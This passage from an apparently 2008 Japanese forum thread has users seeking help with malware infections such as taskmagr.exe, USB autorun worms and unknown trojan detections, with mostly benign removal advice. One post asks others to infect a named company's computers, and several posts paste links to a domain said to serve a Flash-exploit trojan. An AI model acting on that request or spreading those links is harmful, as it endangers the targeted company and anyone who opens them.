08/11/04 21:35:25
>>49
一番安全確実なのはリカバリ。
Microsoft updateはカスタムでIE7インストール、その後SP3インストール。
リカバリ後はブラウザーをOperaかFirefox+Noscriptにする事。
どうしても、リカバリが嫌なら、あまり効果を期待はできないが下の方法を試したら?
「システムの復元」ができれば「システムの復元」して、その後
一旦「システムの復元」を無効にして、再度「システムの復元」を
有効にする。それでも悪影響があれば、アダ被記事参考にして
hostファイル対策。
その後、すべてのソフトを最新版にupdate。
URLリンク(www.higaitaisaku.com)
URLリンク(www.higaitaisaku.com)
51:名無しさん@お腹いっぱい。
08/11/04 22:04:38
>>50
回答ありがとうございます。
Au_.exeのプロパティを見てみたら、Jwordインストーラーと書いてありました。
IEのツールバーの検索を利用した時に押し付けられたのかもしれません。
お騒がせしてすいませんでした。
52:名無しさん@お腹いっぱい。
08/11/04 22:37:58
>>51
それウイルス相当のソフトなので削除が賢明です
53:名無しさん@お腹いっぱい。
08/11/04 23:11:53
上の方に書いてあったとも思うんですけど
ZIPファイルはダウンロードしただけではスパイウェアやウイルスは感染しないという事で良いでしょうか?
54:名無しさん@お腹いっぱい。
08/11/05 07:44:09
うん
55:名無しさん@お腹いっぱい。
08/11/07 00:57:28
すみません。ショートカットキーです。
とあるサイトを見てからずっとショートカットキーです。、語尾に「ショートカットキー」が付いてくるのですがショートカットキーです。・・・
携帯にもウィルスは付くものなのでしょうか?ショートカットキーです。
どなたか教えてください。ショートカットキーです。
56:名無しさん@お腹いっぱい。
08/11/07 01:07:02
>>55
スレチです。
57:名無しさん@お腹いっぱい。
08/11/07 16:57:38
株取引.SCR というウイルスをふんで案の定
C:\Windows\Up\[殺人] <ユーザ名>(yyyymmdd-hhmmss)のメール.zip
が作成されたんですが
それを削除して
もう一度ふんでも
なにも起こりません。
こんなもんなんでしょうか?
58:名無しさん@お腹いっぱい。
08/11/08 00:08:25
基本的なことを質問したいんですが・・
パソコンには ファイアーウォール?というのが元から入ってると思います。
あとセキュリティセンター?もはいってると思うんですが・・
それと セキュリティソフトは全く別の役割をはたすんですか?
ファイアーウォールは基本的には何から守ってくれてるんでしょうか?
あとJCOMでホームページウイルススキャンサービスに入ってるんですが
それだけでは ウイルスからは守られてないんでしょうか?
59:名無しさん@お腹いっぱい。
08/11/08 00:27:40
>>58
URLリンク(www.google.co.jp)
_______ __
// ̄~`i ゝ `l |
/ / ,______ ,_____ ________ | | ____ TM
| | ___ // ̄ヽヽ // ̄ヽヽ (( ̄)) | | // ̄_>>
\ヽ、 |l | | | | | | | | ``( (. .| | | | ~~
`、二===-' ` ===' ' ` ===' ' // ̄ヽヽ |__ゝ ヽ二=''
ヽヽ___// 日本
_____ _____ ______ _______
| ウェブ | | イメージ | | グループ | | ディレクトリ |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
._________________
|ファイアーウォール │・検索オプション
└────────┘・表示設定
| Google検索 | I'm Feeling Lucky | ・言語ツール
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
○ウェブ全体から検索 ◎日本語のページを検索
60:名無しさん@お腹いっぱい。
08/11/08 00:41:31
>>58
ファイアーウォール(防火壁)とは、ある特定のコンピュータネットワークとその外部との通信を制御し
内部のコンピュータネットワークの安全を維持することを目的としたソフトウェア、あるいはそのソフトウェアを搭載したハードウェアである。
外部から内部のコンピュータネットワークへ侵入しようとするクラッキング行為を火事にたとえ、それを食い止めるものとして防火壁という表現を用いている。
>あとJCOMでホームページウイルススキャンサービスに入ってるんですが
>それだけでは ウイルスからは守られてないんでしょうか?
うん。
61:名無しさん@お腹いっぱい。
08/11/08 09:35:45
>>59 吹きましたw
>>60
回答ありがとうございます!!
ファイアーウォールだけでは守りが不十分だからノートンとかをいれたほうがいいんですよね?
62:名無しさん@お腹いっぱい。
08/11/08 09:37:58
あとファイアーウォールは必ずどのpcにも入ってるんですよね?
63: ◆0fQkHdNop2
08/11/08 09:40:17
>>58・・・・・>>60氏の回答に補足しとく。
JCOMのホームページウイルススキャンサービスだけではUSBやFD経由の
ウィルスは防止できないので、JCOMのユーザー無料サービスの
マイシールド(多分、アンラボのInternet Security )もダウンロード
してインストールしたら良い。
ついでに、メールウイルススキャンサービスと迷惑メール撃退サービスも
利用したら良い。
64:名無しさん@お腹いっぱい。
08/11/08 10:42:00
>>63
なるほど!
マイシ導入しておきます・・!
65: ◆0fQkHdNop2
08/11/08 11:02:43
>>61・・・・・>>61見ずに>>63投稿したので補足。
マイシールドをインストールするならノートンは入れる必要ない。
両方入れると不具合が起きるので、どちらか一方にすべきだ。
金持ちで金が余ってて、セキュリティー重視するなら、マイシールドより
ノートン・インターネットセキュリティー2009が良いけど、普通の人間の
場合は常識的に考えたらJCOMのユーザー無料サービスのマイシールド
選択が得だしプロバイダーのサポートも受けやすい。
66:名無しさん@お腹いっぱい。
08/11/08 13:32:26
悪意が潜在するプログラム Suspicious Driver Installation
オンゲしてたらフリートライアルのカスペがこんなの見つけたんだ
ググったけど意味がよくわからない
これって放置しててもいいのかな? 誰かお願いします
67: ◆0fQkHdNop2
08/11/08 14:03:27
>>66
カスペ・スレかゲーム関係の板のそのゲームのスレで聞いた方が良いと思う。
そのゲームが安全なゲームだとすれば、ゲームソフトのドライバーの
可能性が高いようにも思えるが、そのゲームもカスペの対応も知らないので
断言できない。ゲームソフトにセキュリティーホールがあってポート解放
してたらマルウェア入れられる可能性もあるかもしれない。
68:名無しさん@お腹いっぱい。
08/11/08 15:22:57
>>67
返信ありがとうございます
やはりゲームに関係してたのですね
これで対象外にできます
69:名無しさん@お腹いっぱい。
08/11/08 15:59:22
f.exe
70:名無しさん@お腹いっぱい。
08/11/09 17:27:55
【使用OS】 「windows VISTA HOME PREMIUM」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「AVG」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「トロイの木馬generic12.HNC」 ファイルパス C:\Program Files\VistaCodecPack\Tools\233.exe
たった今PC起動後すぐにウイルスが検出されたとメッセージが出て「この脅威の強制削除を行いますか?」
という問いかけの下に 「はい」と「いいえ」のボタン、
そして(赤字で)「強制除去によりシステムが不安定になったかあるいはクラッシュしました」とメッセージが出ています。
また該当のファイルのプロパティを見てみると
ファイルの種類 アプリケーション(exe)
説明 233
作成日時 2007?年?10?月?19?日、??0:15:45
アクセス日時 2007?年?12?月?27?日、??19:01:51
とあり同じtoolsフォルダに「238」というファイルと
「reset」
ファイルの種類 アプリケーション(exe)
説明 new user account Setup
作成日時 2007?年?11?月?16?日、??10:58:36
アクセス日時 ?2007?年?12?月?27?日、??19:01:52
という計3つのファイルがあります。
ウイルス名を検索しても何も情報がないのでどうしたらいいか分からず不安です。
何かアドバイスがあればよろしくお願いします。
71:名無しさん@お腹いっぱい。
08/11/09 20:12:12
【使用OS】 「xp pro sp2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「ウィルスバスター2007の機能を使用」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_STARTPA.DS」
「C:\WINDOWS\system32\taskmagr.exe」
URLリンク(www.trendmicro.co.jp)
トレンドマイクロの該当ページを見ても削除方法が載っていないので、教えてください。
72:名無しさん@お腹いっぱい。
08/11/09 20:41:38
>>71
スペルは合っているか?
taskmgr.exeではなくtaskmagr.exeなんだな?
スタートページを書き換えるタイプのようだから
スタートページが書き換えられていないか確認。
自動実行されるようになっていないか確認。
「お気に入り」に書き足すやつもあるみたいだから、
ついでに「お気に入り」も確認しておこう。
その後該当ファイルを削除すればよいかと。
73:72
08/11/09 20:55:00
さらに「信頼済みサイト」に変な物が追加されてないかも確認しておこうか。
74: ◆0fQkHdNop2
08/11/09 20:59:44
>>70
とりあえず、VirusTotalで検査したら?
URLリンク(www.virustotal.com)
75: ◆0fQkHdNop2
08/11/09 21:04:03
>>71-72
そう言えば、数日前、taskmgr.exeではなくtaskmagr.exeがあるという者が
いたような気がする。どのスレだったか忘れたが。
76: ◆0fQkHdNop2
08/11/09 21:09:38
初心者スレだった。
スレリンク(sec板:73番)n-75
73 :名無しさん@お腹いっぱい。:2008/11/04(火) 06:37:16
すみません、みなさんのXPのsystem32内に「taskmagr.exe」というバージョン情報タブがないexeはあります?
「taskmgr.exe」ではなく「taskmagr.exe」です。
77:71
08/11/09 21:41:05
>>72
あら、スペル間違えてましたね。
taskmagr.exe でOKです。
スタートページもお気に入りも信頼済みサイトも何も異常無しなんですよ。
それでもウイルス検出されるんです。
それと、具体的な削除方法を教えてください。
system32から該当ファイルを削除しようとしても出来ないんです。
プロセスを終了させることも出来ません。
78: ◆0fQkHdNop2
08/11/09 21:54:44
>>77
安全確実にリカバリ。
VirusTotal検査結果↓
URLリンク(www.virustotal.com)
Startpageとかスパイウェアみたいな名前ついてるのもあるね。
79:72
08/11/09 22:02:37
>>77
初心者ではないのだろう?少し冷静になろう。
削除できないということは実行中なのだろう。
じぶんで起動していないなら自動実行されているのだろう。
だから「自動実行」するように設定されていないか確認しよう。
80:71
08/11/09 22:45:55
>>78-79
いろいろとアドバイスありがとうございました。
無事削除出来ました。
セーフモードから削除するという初歩的?なことを忘れていました。
何年振りかの感染だったので忘れていたようです。
ご迷惑おかけしました。
81:名無しさん@お腹いっぱい。
08/11/09 23:53:09
質問なんですが最近でも山田ウィルスの亜種(ウィルス対策ソフトには引っ掛からない)は出ているんでしょうか?
それともほとんどの山田ウィルスは対策ソフトで対策対応済みですか?
82:名無しさん@お腹いっぱい。
08/11/10 01:33:08
出てない。
対応済み。
83:名無しさん@お腹いっぱい。
08/11/10 04:30:16
>>76
その>>73て俺なんだけど実はまだ格闘中なんだw
よく調べたらどんどんトロイが出てきて「OSインストールして一週間でなぜ・・・」
といろいろ検索してたらさっき↓を見つけた。
URLリンク(www.avpclub.ddns.info)
実際俺はFlashGetを入れてるしソフ板のFlashGetスレでもチョロっと話しが出てたから
多分ビンゴだと思うんだけど。もうちょい調べてみる。
84:名無しさん@お腹いっぱい。
08/11/10 19:25:58
DrWebが対応してるみたいだから
Dr.Web CureIt!でも落としておけば?
FlashGetは以前のバージョンでスパイウエア疑惑があったが
今もそんな噂があるのか?
85:名無しさん@お腹いっぱい。
08/11/10 21:04:19
最近は聞かないな。
自分も数ヶ月前に入れてた(使えないからすぐ消した)けど何もなかった。
86:名無しさん@お腹いっぱい。
08/11/11 11:25:03
>>83
たぶんビンゴですね。うちも同じ症状です。FlashGet Version 1.9.6.1073導入済。
定期的にアップされるファイルをダウンするために毎日バッチでFlashGetを動かしだしてから。
10/4 sprint.dll
10/25 dmsvct.dll
10/25 xmlpro.dll
11/7 dmserv.dll
いずれもC:\WINDOWS\system32\にあるのをNortonが発見、検疫されました。
で、きょうカスペルスキー オンラインスキャナかけたらtaskmagr.exe見つけました。
ご丁寧にほかのwindowsシステムファイルと日時あわせてあります。
状況証拠だけで、クロと決まったわけではありませんが、疑わざるを得ません。
バッチ機能、便利だったんですが残念ですね。気持ち悪いのでOSごと再導入します。
87:名無しさん@お腹いっぱい。
08/11/11 17:20:00
URLリンク(internet.watch.impress.co.jp)
この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?
88:名無しさん@お腹いっぱい。
08/11/11 22:47:24
188 名無しさん@お腹いっぱい。 mail:sage 2008/11/11(火) 17:16:09
URLリンク(internet.watch.impress.co.jp)
この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?
89:名無しさん@お腹いっぱい。
08/11/12 00:08:07
山田ウィルスなんですが、hostファイルのlocalhostに127.0.0.1以外のIPアドレスがあれば感染している可能性とあるんですが、
127~の下の行に::1と書かれています。これはウィルスでしょうか?それとも、問題ありませんか?
90:名無しさん@お腹いっぱい。
08/11/12 00:20:35
激しく板違い。
割れ厨に教えることは何もありません。
91:名無しさん@お腹いっぱい。
08/11/12 00:29:51
>>89
ここを参考
URLリンク(www.geocities.jp)
>>90
勝手に割れ厨って決めつけるなよwお前と違うんだからww
92:名無しさん@お腹いっぱい。
08/11/12 01:31:25
テンプレ補足
P2P(Winny、Share、etc.)ウイルス(キンタマ、山田、原田、etc.)は板違い。移動しろ。
P2P以外(アップローダ、etc.)で踏んだとしても移動しろ。
Download
URLリンク(changi.2ch.net)
キンタマ、山田、ニュイルスなどでスレ探せ。
93:名無しさん@お腹いっぱい。
08/11/12 02:05:26
圧縮されてるファイル(ウイルス入り)は
マウスオーバーとか移動させたりしただけで感染しますか?
94:名無しさん@お腹いっぱい。
08/11/12 02:22:23
問題ない。
95:名無しさん@お腹いっぱい。
08/11/12 02:31:53
>>94
thx
96:名無しさん@お腹いっぱい。
08/11/13 00:40:20
Celeron433、メモリ512MB、Windows2000のPCに
アンチウイルスとアンチスパイウェアを入れたいのですが、
オススメがあれば教えてください。
97:名無しさん@お腹いっぱい。
08/11/13 01:11:04
【使用OS】 XP Home SP2
【使用ブラウザ】 Internet Explorer 6
HDD内をいろいろ見てたら
「TEMP」の中にIE5のデータが残ってるみたいなんですが
これって消去しても問題あにでしょうか?
というか、「TEMP」の中のファイルを全部消しちゃっても大丈夫でしょうか?
98:名無しさん@お腹いっぱい。
08/11/13 05:48:08
父があるアーティストの曲が聴きたいといっていたので
父のフラッシュメモリを借りてそこに曲を入れてやろうと思い、恥ずかしながらp2pソフトで曲をダウンロードしました
wmpで再生しようとすると、mp3の形式が違う云々と出てきたのですが、アイコンがmp3のものだったので無視してしまいましたところ
急にIEが開きmp3.exeという名のダウン窓が出てきたのでダウンロードせず閉じたのですが
この時点でウイルスには感染しないのでしょうか
父のフラッシュメモリを挿したままのことだったので
父がまだ仕事をしており、父のPCの情報が漏洩しないかとても不安です
携帯からで変な文かと思いますが宜しくお願いします
99:名無しさん@お腹いっぱい。
08/11/13 05:53:24
>>98
テンプレ嫁
ここはそういう質問スレじゃないから
100:名無しさん@お腹いっぱい。
08/11/13 06:11:29
移動します
すいませんでした
101:名無しさん@お腹いっぱい。
08/11/13 22:55:16
俺も今タククマネージャ見たらtaskmagr.exeがいた
確かにここ何日かにFlashget入れてたな
うーんこれさえなければ悪いソフトじゃないんだが
ノートン先生が無反応なとこ見るとウィルスではないんだろうか
でも名前がめっちゃウィルスっぽい
102:名無しさん@お腹いっぱい。
08/11/13 22:59:54
( ´_ゝ`)
103:名無しさん@お腹いっぱい。
08/11/13 23:12:56
というかノートンが糞なのか
ひょっとして
104:名無しさん@お腹いっぱい。
08/11/14 16:19:24
今頃気づいたのか?
105:名無しさん@お腹いっぱい。
08/11/16 02:53:31
ウィルスについての質問なんだけど。
Trojan.Generic.1007377ってどんなウィルスなんだ?
Bitdeffenderを使って調べたところ見つけたんだが、ググっても出てこない。
106:名無しさん@お腹いっぱい。
08/11/16 02:57:32
スペル間違えた
BitdeffenderでなくてBitdefenderだった
107:名無しさん@お腹いっぱい。
08/11/16 04:12:28
>>105
検出されたファイルをVirusTotalに上げて他社の検出名でググってみたら?
108:名無しさん@お腹いっぱい。
08/11/16 04:43:51
>>107
同意
Genericだから、ヒューリの可能性が高いし
109:名無しさん@お腹いっぱい。
08/11/16 05:52:45
まずVirus Totalで調べたところ、44.45%になった。
以下、検出結果。
AntiVir 7.9.0.31 TR/Crypt.XPACK.Gen
Avast 4.8.1281.0 Win32:Trojan-gen {Other}
AVG 8.0.0.199 SHeur.CDNZ
BitDefender 7.2 Trojan.Generic.1007377
CAT-QuickHeal 10.00 (Suspicious) - DNAScan
eSafe 7.0.17.0 Suspicious File
Ikarus T3.1.1.45.0 Trojan.Crypt.XPACK
GData 19 Trojan.Generic.1007377
K7AntiVirus 7.10.526 Trojan.Win32.Malware.1
McAfee 5435 Generic.dx
Norman 5.80.02 W32/Malware.EEGT
Panda 9.0.0.4 spicious file
SecureWeb-Gateway 6.7.6 Trojan.Crypt.XPACK.Gen
Sophos 4.35.0 Mal/EncPk-CR
Sunbelt 3.1.1801.2 VIPRE.Suspicious
TrendMicro 8.700.0.1004 PAK_Generic.001
他は検出していない。
これってウィルスなんだろうか?
110:名無しさん@お腹いっぱい。
08/11/16 06:01:23
半角スペース使ったため隙間が省略されてしまった。
かなり見づらくなってるから再度。
AntiVir 7.9.0.31 TR/Crypt.XPACK.Gen
Avast 4.8.1281.0 Win32:Trojan-gen {Other}
AVG 8.0.0.199 SHeur.CDNZ
BitDefender 7.2 Trojan.Generic.1007377
CAT-QuickHeal 10.00 (Suspicious) - DNAScan
eSafe 7.0.17.0 Suspicious File
Ikarus T3.1.1.45.0 Trojan.Crypt.XPACK
GData 19 Trojan.Generic.1007377
K7AntiVirus 7.10.526 Trojan.Win32.Malware.1
McAfee 5435 Generic.dx
Norman 5.80.02 W32/Malware.EEGT
Panda 9.0.0.4 spicious file
SecureWeb-Gateway 6.7.6 Trojan.Crypt.XPACK.Gen
Sophos 4.35.0 Mal/EncPk-CR
Sunbelt 3.1.1801.2 VIPRE.Suspicious
TrendMicro 8.700.0.1004 PAK_Generic.001
111:名無しさん@お腹いっぱい。
08/11/16 06:21:38
これだけ検出されると可能性は高いんじゃない?
ベンダにファイルを提出すれば検査結果を教えてくれるよ。
112:名無しさん@お腹いっぱい。
08/11/16 12:57:08
ありがとう。
ベンダに提出してみます。
113:名無しさん@お腹いっぱい。
08/11/16 17:42:43
CとDがクリックで開かなくなった…
スクリプトファイルが見つかりませんって…
114:名無しさん@お腹いっぱい。
08/11/18 09:43:22
AVGバージョン8で、generic10.caqというウィルスが検出されました。
対処はできたんですが、このウィルスがどんなものなのかググってもわかりません。
AVGの指示通り処理すれば大丈夫ですかね?
115:114
08/11/18 09:46:02
ググったら、「ca」はあったのですが「caq」はヒットしなかった、ということです。
116:名無しさん@お腹いっぱい。
08/11/18 09:51:50
名前なんてアンチウイルスによってバラバラなんだから
AVGスレで聞けば?
117:名無しさん@お腹いっぱい。
08/11/19 20:29:07
>>114
genericでぐぐれうんこ
118:名無しさん@お腹いっぱい。
08/11/20 04:44:03
アルボッキ性膜ってスレにあるアルバック成膜㈱の糞会社のPCにウィルス贈呈したいんだけど誰かやっちゃってくれません?
あんな会社目障りなので無くなってほしいんです
会社のPCとかに潜り込んで目茶苦茶にしたいんですが出来ませんかねぇ
119:名無しさん@お腹いっぱい。
08/11/20 08:23:58
>>118
その程度の頭じゃ無理
120:名無しさん@お腹いっぱい。
08/11/20 12:27:32
IPアドレスの認証や確立を妨げるウイルスってありますか?
常接なんですが、ヤケにDLに時間のかかるメールを受信した後、
PCを再起動したらIPアドレスの確立と認証ができなくなっていました。
ハード的にはLANを認識しているみたいです。
121:↑
08/11/20 12:29:20
ほぼ同時に3台やられたんで、泣き…です。
122:名無しさん@お腹いっぱい。
08/11/20 14:44:51
男性俳優板行くとカスペが反応するんだけどなにこれ。
URLリンク(u.cruze3.cn)
トロイの木馬っつーんだけどほんと?
123:名無しさん@お腹いっぱい。
08/11/20 14:57:27
直リンするんじゃねーよ。
FlashPlayerの脆弱性を使うトロイだな。
9.0.124未満ならあぼん。
124:名無しさん@お腹いっぱい。
08/11/20 14:58:40
ごめん。
>9.0.124未満ならあぼん。
そうなんだ。
つーか2chのあちこちの板にしかけられててこわひ。。
125:名無しさん@お腹いっぱい。
08/11/20 15:06:46
URLリンク(u.cruze3.cn)
URLリンク(u.cruze3.cn)
あとこれもついてきた。
2ch開くだけでなんでこんなウィルスついてくんの?
126:名無しさん@お腹いっぱい。
08/11/20 15:07:56
ググッても出てこないし。
こえー。
127:名無しさん@お腹いっぱい。
08/11/20 15:08:03
そのサイトの調査結果
URLリンク(www.aguse.jp)
検出されたマルウェアの詳細
URLリンク(www.f-secure.co.jp)
URL直に貼るな粕。
128:名無しさん@お腹いっぱい。
08/11/20 15:09:15
>>125
板開いてもそんなの無いぞ。
ブラウザのキャッシュ壊れてんじゃね?
129:名無しさん@お腹いっぱい。
08/11/20 15:21:18
>>128
www.proxylist.sakura.ne.jp
これ開いたらだった
ごめん
男性俳優板じゃなかった。スマソ
130:ナイトウォッチ
08/11/20 16:14:17
ガイシュツかも・・・
無料でウィルス検索できるサイト教えてください。
パソコンまだなれてなくて・・
メールを送ったらおかしくなったっていわれてウィルスかな?と思って
131:名無しさん@お腹いっぱい。
08/11/20 17:48:30
>>130
なんでアンチウイルスソフト入れないの?
馬鹿なの?
132:ナイトウォッチ
08/11/20 19:20:01
小さい会社のパソコンで入ってないみたいなんですよね;;
ノートンいれます。
133:名無しさん@お腹いっぱい。
08/11/20 22:04:58
>>132
ほらよ
スレリンク(sec板)l50
134:【来週強行・革命成立?】最凶の国籍法改正案
08/11/21 01:10:28
【来週強行・革命成立?】最凶の国籍法改正案 vs 最強のFAX凸撃 01/18
URLリンク(jp.youtube.com)
URLリンク(jp.youtube.com) 02/18
URLリンク(jp.youtube.com) 03/18
URLリンク(jp.youtube.com) 04/18
URLリンク(jp.youtube.com) 05/18
URLリンク(jp.youtube.com) 06/18
2時間目
URLリンク(jp.youtube.com) 07/18
URLリンク(jp.youtube.com) 08/18
URLリンク(jp.youtube.com) 09/18
URLリンク(jp.youtube.com) 10/18
URLリンク(jp.youtube.com) 11/18
URLリンク(jp.youtube.com) 12/18
3時間目
URLリンク(jp.youtube.com) 13/18
URLリンク(jp.youtube.com) 14/18
URLリンク(jp.youtube.com) 15/18
URLリンク(jp.youtube.com) 16/18
URLリンク(jp.youtube.com) 17/18
URLリンク(jp.youtube.com) 18/18
135:名無しさん@お腹いっぱい。
08/11/21 07:19:25
ツマンネ
136:名無しさん@お腹いっぱい。
08/11/21 08:44:56
>>134
つまんねー
137:名無しさん@お腹いっぱい。
08/11/22 22:53:38
【使用OS】 『XP pro 2002 sp3』
【使用ブラウザ】 『IE6』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『ウィルスセキュリティZero』
スパイウェア・ボット対策ソフト 『無』
【回線の種類・ルータの有無】 『ADSL マンション』
【具体的な症状】
突然しねしね団Flashが再生される。
DLした覚えはないです。
画面が閉じれない
【過程と措置】強制終了→起動→ウイルス検査
【その他】 海外赴任(インドネシア)の日本人です。
突然フラッシュが「死ね死ね 日本人」と始まり
身の危険も感じております。恨みを買われる覚えもあります。
どうかアドバイスお願い致します。
138: ◆N9P3SuvBPo
08/11/23 00:25:30
>137
セキュ質で回答が得られなかったとはいえ、マルチするのは良くありませんよ。
焦らずじっくり待ってみましょ。
139:名無しさん@お腹いっぱい。
08/11/23 13:24:30
URLリンク(koideai.com)
アドレスはPCの状態の画像です
検索したけどよくわかりません・・・
バスターで反応しなかったからウィルスじゃないのかな
このツールバーがサイトまわってたら知らないうちに入ってて
アンインストールしようとしても変なサイトに飛ばされそうになって
恐ろしくて途中で中断してしまいます
詳しいこと知ってる人これが一体何なのか教えてください・・・;
140:名無しさん@お腹いっぱい。
08/11/23 14:26:51
「Pirate Bay」っていうBit Torrentのファイル検索エンジンのツールバーみたい。
普通にアインストールしても大丈夫じゃない?
どっかにのサイトに飛ばされるのが嫌なら
FWの方でアンインストールする時だけIEのネットワーク接続を遮断すればいいし。
まぁ、これに懲りたらブラウザを変えることですな。
141:名無しさん@お腹いっぱい。
08/11/23 21:24:09
なぜかさっきの画像が出会い系に飛ぶようになっとる・・・
ウィルス関係ではないんですね
それが聞けただけでも安心できます!
とりあえず消してきます
142:名無しさん@お腹いっぱい。
08/11/26 00:21:52
PCを起動すると勝手に音楽が始まる…。
しかも中国語とかのラップ。気持ち悪いです。
これはウィルスですか?
143:名無しさん@お腹いっぱい。
08/11/26 00:54:25
俺のじゃないから問題なし
安心して寝な
144:名無しさん@お腹いっぱい。
08/11/27 00:12:42
>>142
勝手にieがコッソリ立ち上がる奴だろ?俺も同様な症状だ
極論だがieをアンインストールしてFirefoxらへんを使えば一応解決するとは思うが・・・
ウイルス対策ソフトの対応待ちか?
145:名無しさん@お腹いっぱい。
08/11/27 18:33:12
>>142
俺も同症状だ。
IEをアンインストールで解決するの?
146:名無しさん@お腹いっぱい。
08/11/27 20:15:56
とりあえずIEをリネームして様子見してはどうか
147: ◆N9P3SuvBPo
08/11/27 20:52:45
>142
たぶん無意味かと思うけど、
音楽が始まったらタスクマネージャを起動させて、怪しいプロセスが動いてないか確認してみて。
148:名無しさん@お腹いっぱい。
08/11/27 21:42:24
>>142
Anvir Task Manager Freeを使って、スタートアップサービスプロセスの怪しいものを全て
Virustotalに投げてみれば?
ちなみに最近Languageに日本語も追加された(多少文字化けあり)。
URLリンク(www.anvir.com)
149:名無しさん@お腹いっぱい。
08/11/27 22:46:58
【使用OS】 XP Home SP2
【セキュリティソフトと年式】 ウイルスバスター2009
【スパイウェア対策ソフト】 同上
【回線の種類・ルータの有無】 ADSL ルーター有
【具体的な症状】
手動検索を先日かけたところ、『TROJ_MESOUM.AE』というウイルスに感染していると言う通知を受け、隔離したのですが
隔離フォルダから駆除を試したところ、駆除ができませんでした。
削除していいものかよくわからないので、感染していたファイル名を検索していたらこちらを拝見させていただいたので
相談したくて書き込みをさせていただきました。
どうしたらよいのでしょうか?
感染したファイルは
C\WINDOWS\system32\msGDl1.dllです
よろしくお願いいたします。
150:名無しさん@お腹いっぱい。
08/11/28 01:57:39
>>142です!
みなさん、親切にありがとうございます。
音楽が流れてもIEが勝手に起動とかはしてないです。
でも、タスクマネージャーのプロセスを確認したら、IEが動いてました。
(画面上では起動されてません)
そしてCPU稼動率が100%になってました。
みなさんに教えてもらったことを試してみますね!
また結果報告に来ます。
ちなみに、音楽はかからない時もあります。
急にかかったり、繰り返しかかったり、一度で終わる時もあります。
151:名無しさん@お腹いっぱい。
08/11/28 12:45:25
スレイプニルでネット巡回中、突然「こんにちは!こんにちは!」というポップアップ表示がでてきました。
これは最近流行のウィルスだったりします?
152:名無しさん@お腹いっぱい。
08/11/28 12:46:23
ああ、やばいな
153:名無しさん@お腹いっぱい。
08/11/28 14:26:46
はまちちゃんだな
154:名無しさん@お腹いっぱい。
08/11/29 02:54:11
ルックルックこんにちはだな
155:名無しさん@お腹いっぱい。
08/11/29 10:39:11
USBをさしたらウイルスソフトの反応があってRECYCLERというフォルダとAutorun.infがありました
一応、USBの中のそのフォルダとファイルは削除してPCはシステムの復元をしました
するべき対処として他になにかするべきことはありますか?
OS初期化したほうがいいでしょうか?
156: ◆0fQkHdNop2
08/11/29 12:08:36
>>155
USBによる自動実行ウィルス(USBワーム)でしょうけど、ウィルス対策
ソフトが検知したので、少なくともそのUSBワーム本体の実行前に防御して
くれてるはずです。
ただし、可能性は低いですが、防御が攻撃の自動実行司令ファイル
「autorun.inf」読み込み後でそのUSBワーム本体実行前になされた場合で、
しかも、そのUSBワーム本体以外にウィルス対策ソフトに未反応の別の
ウィルスや攻撃コード等が他にあった場合にはウィルス対策ソフトが
防ぎきれてない事があります。
しかし、その場合でも、システムの復元したので、削除もしくは休眠状態
になってるはずなので、そういう場合でも一応は大丈夫でしょう。
ただし、システムの復元前にネット接続してた場合には、ウィルス対策
ソフト未対応の別のウィルスや攻撃コードが他にあった場合に備えて
パスワード変更を推奨します。また、システムの復元の感染後の復元
ポイントにはUSBワームが含まれているので、システムの復元を
一旦無効にして、その後、再度有効にしてください。(方法が
わからない場合は自分で調べてください。)
尚、そのパソコンに重要機密とか大金のからむパスワードとか流出すると
人生破滅するような情報があれば、万が一を考えて自己責任でリカバリ
するか否かを考慮してください。
また、USBワームの感染経路も調べる事を推奨します。
157: ◆0fQkHdNop2
08/11/29 12:28:57
>>155
今後の事を考えて自動再生をオフにされる事を推奨します。
URLリンク(windowshelp.microsoft.com)
158:名無しさん@お腹いっぱい。
08/11/29 17:32:02
>>156
ありがとうございます。
システムの復元をしたところ今度はwindowsがまともに起動しなくなりました。
とりあえず復元前に戻しましたが、もうリカバリしようかと思います。
159:名無しさん@お腹いっぱい。
08/11/29 18:44:02
その方が賢明だねw
160:名無しさん@お腹いっぱい。
08/12/04 17:13:06
ウィルスバスターがウィルスの定義ファイル更新したら
リアルタイム検索つけてるとBeckyが繋がらなくなったぜ
氏ね
161:名無しさん@お腹いっぱい。
08/12/04 17:24:04
リアルタイム検索にある
受信メール検索
送信メール検索
を切ったらOKになった
氏ね
162:名無しさん@お腹いっぱい。
08/12/04 22:26:57
>>142さん
その後の状況はどうですか。
同じ症状が出ました。
163:名無しさん@お腹いっぱい。
08/12/04 22:46:23
>162さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
>162さんはいれてないですか?
164:162
08/12/04 22:47:45
↑ミスったので修正…
>>162さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
>>162さんはいれてないですか?
165:名無しさん@お腹いっぱい。
08/12/05 01:02:26
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
166:名無しさん@お腹いっぱい。
